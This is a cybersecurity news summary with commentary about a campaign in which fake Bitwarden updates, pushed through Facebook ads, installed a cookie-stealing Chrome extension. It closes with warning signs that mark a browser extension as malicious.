TechRadar reports a sophisticated cyberattack campaign was discovered in which hackers are distributing fake Bitwarden security updates through deceptive Facebook advertisements.
These ads are designed to mimic legitimate Bitwarden branding and create a sense of urgency with warnings like "Your Passwords Are at Risk!" to lure users into clicking. Once clicked, users are redirected through several URLs to a phishing page that closely resembles the official Chrome Web Store.
Instead of a real browser extension, users are prompted to download a ZIP file that must be manually installed in Chrome's Developer mode.
This bypasses standard security checks and allows the malicious extension to request broad permissions, including access to all websites, network requests, storage, and cookies.
Once installed, the extension targets Facebook users by extracting the "c_user" cookie, which contains the user's Facebook ID. It then uses a background script to harvest additional data, such as location and IP address, leveraging Facebook's Graph API to exfiltrate the stolen information to a command-and-control server hosted via Google Script.
Bitdefender, the cybersecurity firm that uncovered the campaign, warns that the malware is capable of stealing both personal and financial data from individuals and businesses.
They advise users and IT teams to be vigilant about browser extensions that request excessive permissions or contain obfuscated code, particularly those interacting with Facebook's Graph API.
The campaign highlights the growing trend of using social media platforms as vectors for malware distribution and the importance of verifying the authenticity of software updates and browser extensions before installation.
Source: https://www.techradar.com/pro/hackers-pushing-fake-bitwarden-updates-hit-thousands-of-devices-with-data-stealing-malware
Commentary
Online criminals are increasingly exploiting social media platforms because they offer a vast and easily accessible pool of potential victims.
These platforms are designed to foster trust and engagement, which makes users more likely to click on links or interact with content that appears familiar or urgent.
By using paid advertisements or hijacked accounts, attackers can distribute malicious content that mimics legitimate brands or services, such as password managers or browser extensions.
The social nature of these platforms also means that malicious links can spread quickly through shares, likes, or comments, amplifying the reach of the attack with minimal effort.
As for browser extensions, they are a favored tool for online criminals because they operate with elevated permissions within the browser environment.
Once installed, a malicious extension can access sensitive data such as login credentials, cookies, browsing history, and even manipulate web content. These characteristics are ideal for stealing personal and financial information or for conducting surveillance.
Extensions can also be updated remotely, allowing attackers to change their behavior after installation without the user's knowledge. The fact that many users are unfamiliar with how browser extensions work or what permissions they require makes them an attractive vector for malware distribution.
There are several red flags that can indicate a browser extension is malicious. One major warning sign is if the extension asks for excessive permissions that seem unrelated to its stated function, such as access to all websites, clipboard data, or the ability to read and change data on visited sites.
Another red flag is if the extension must be installed manually in developer mode, which bypasses the usual security checks of official browser stores. Obfuscated or minified code, lack of a clear privacy policy, and poor or no user reviews are also indicators of potential risk.
The final takeaway is that users should be cautious of extensions promoted through unofficial channels or those that mimic well-known brands, but are not linked from the official website.
